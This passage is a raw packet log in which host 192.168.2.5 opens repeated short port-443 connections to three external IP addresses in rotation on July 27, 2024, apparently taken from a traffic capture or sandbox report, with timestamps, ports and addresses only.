Jul 27, 2024 07:31:36.741086006 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:36.741105080 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:37.327254057 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:37.327343941 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:37.330230951 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:37.330249071 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:37.330307961 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:37.330317974 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:37.330372095 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:37.330380917 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:37.330600023 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:37.330744028 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:37.372523069 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:38.766588926 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:38.766815901 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:38.766987085 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:38.781090021 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:38.781090021 CEST	51877	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:38.781117916 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:38.781135082 CEST	443	51877	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:38.892617941 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:38.892707109 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:38.892815113 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:38.893340111 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:38.893369913 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:39.577411890 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:39.577554941 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:39.580183983 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:39.580199003 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:39.580255032 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:39.580260038 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:39.580319881 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:39.580324888 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:39.580564022 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:39.580766916 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:39.624537945 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:40.495732069 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:40.496126890 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:40.496220112 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:40.510941982 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:40.510999918 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:40.511101007 CEST	51878	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:40.511122942 CEST	443	51878	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:40.626956940 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:40.627023935 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:40.627104998 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:40.627537012 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:40.627566099 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:41.404423952 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:41.404501915 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:41.416696072 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:41.416718006 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:41.416768074 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:41.416774988 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:41.416815996 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:41.416820049 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:41.417471886 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:41.417634010 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:41.464490891 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:42.752866983 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:42.753063917 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:42.753135920 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:42.768820047 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:42.768841982 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:42.768862009 CEST	51879	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:42.768870115 CEST	443	51879	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:42.876758099 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:42.876846075 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:42.876933098 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:42.877299070 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:42.877335072 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:43.467439890 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:43.467746019 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:43.469774008 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:43.469795942 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:43.469866037 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:43.469877958 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:43.470141888 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:43.470340967 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:43.512594938 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:44.824768066 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:44.824877977 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:44.824949980 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:44.841464996 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:44.841538906 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:44.841578960 CEST	51880	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:44.841598034 CEST	443	51880	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:44.954916954 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:44.954988956 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:44.955081940 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:44.955421925 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:44.955442905 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:45.636168957 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:45.636249065 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:45.638596058 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:45.638607979 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:45.638676882 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:45.638680935 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:45.638933897 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:45.639050961 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:45.680541992 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:46.663923979 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:46.664105892 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:46.664201975 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:46.679979086 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:46.680021048 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:46.680049896 CEST	51881	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:46.680064917 CEST	443	51881	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:46.783102036 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:46.783158064 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:46.783230066 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:46.783579111 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:46.783596039 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:47.387061119 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:47.387177944 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:47.389185905 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:47.389211893 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:47.389293909 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:47.389306068 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:47.389566898 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:47.389724970 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:47.432540894 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:48.621865988 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:48.622045994 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:48.622129917 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:48.635905981 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:48.635951996 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:48.635982037 CEST	51882	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:48.635998011 CEST	443	51882	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:48.751827955 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:48.751914024 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:48.752000093 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:48.752310991 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:48.752342939 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:49.380331993 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:49.380476952 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:49.383095026 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:49.383116961 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:49.383182049 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:49.383193970 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:49.383455038 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:49.383625984 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:49.383657932 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:50.612993002 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:50.613074064 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:50.613137960 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:50.630426884 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:50.630476952 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:50.630505085 CEST	51883	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:50.630522966 CEST	443	51883	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:50.736438036 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:50.736535072 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:50.736614943 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:50.736999035 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:50.737030029 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:51.390042067 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:51.390156031 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:51.393043041 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:51.393064022 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:51.393131018 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:51.393141985 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:51.393292904 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:51.393440008 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:51.436530113 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:52.438587904 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:52.438692093 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:52.438771963 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:52.454819918 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:52.454862118 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:52.454890013 CEST	51884	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:52.454907894 CEST	443	51884	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:52.564321995 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:52.564374924 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:52.564444065 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:52.564836979 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:52.564860106 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:53.206756115 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:53.206850052 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:53.209614038 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:53.209628105 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:53.209673882 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:53.209680080 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:53.209723949 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:53.209728003 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:53.209889889 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:53.210010052 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:53.252520084 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:54.604104996 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:54.604192019 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:54.604248047 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:54.620968103 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:54.620969057 CEST	51885	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:54.620992899 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:54.621026993 CEST	443	51885	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:54.736474991 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:54.736567020 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:54.736658096 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:54.737032890 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:54.737067938 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:55.344701052 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:55.344795942 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:55.360441923 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:55.360507011 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:55.360572100 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:55.360584974 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:55.360703945 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:55.360713959 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:55.360778093 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:55.360904932 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:55.404539108 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:56.650007010 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:56.650110006 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:56.650193930 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:56.665966034 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:56.665997028 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:56.666131973 CEST	51886	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:56.666148901 CEST	443	51886	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:56.767622948 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:56.767699003 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:56.767782927 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:56.768270969 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:56.768299103 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:57.437088013 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:57.437191010 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:57.439915895 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:57.439929962 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:57.439980030 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:57.439996004 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:57.440049887 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:57.440056086 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:57.440787077 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:57.440979004 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:57.484514952 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:58.458442926 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:58.458976984 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:58.459075928 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:58.479682922 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:58.479684114 CEST	51887	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:58.479731083 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:58.479760885 CEST	443	51887	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:58.595966101 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:58.596054077 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:58.596148014 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:58.596628904 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:58.596663952 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:59.216378927 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:59.216479063 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:59.219316006 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:59.219343901 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:59.219417095 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:59.219428062 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:59.219693899 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:59.219852924 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:59.260515928 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:00.563992977 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:00.564214945 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:00.564271927 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:00.588233948 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:00.588274956 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:00.588330984 CEST	51888	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:00.588346958 CEST	443	51888	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:00.692471981 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:00.692558050 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:00.692647934 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:00.693082094 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:00.693120003 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:01.287448883 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:01.287630081 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:01.290128946 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:01.290158033 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:01.290227890 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:01.290241003 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:01.290307999 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:01.290318012 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:01.290940046 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:01.291115999 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:01.332576036 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:02.521130085 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:02.521390915 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:02.521501064 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:02.539241076 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:02.539292097 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:02.539369106 CEST	51889	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:02.539385080 CEST	443	51889	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:02.642647982 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:02.642682076 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:02.642760992 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:02.643243074 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:02.643254995 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:03.306466103 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:03.306607008 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:03.341423988 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:03.341456890 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:03.343658924 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:03.343677998 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:03.343739986 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:03.343749046 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:03.343873978 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:03.344014883 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:03.344033003 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:04.192770004 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:04.192879915 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:04.192931890 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:04.210654974 CEST	51890	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:04.210669994 CEST	443	51890	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:04.314368963 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:04.314464092 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:04.314575911 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:04.315027952 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:04.315064907 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:04.897478104 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:04.897584915 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:04.900094986 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:04.900125027 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:04.900194883 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:04.900207043 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:04.900477886 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:04.900686026 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:04.944571018 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:06.245110989 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:06.245341063 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:06.245438099 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:06.260813951 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:06.260839939 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:06.260857105 CEST	51891	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:06.260864973 CEST	443	51891	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:06.376924992 CEST	51892	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:06.377003908 CEST	443	51892	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:06.377089024 CEST	51892	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:06.377551079 CEST	51892	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:06.377569914 CEST	443	51892	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:07.002898932 CEST	443	51892	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:07.003021955 CEST	51892	443	192.168.2.5	107.173.160.139
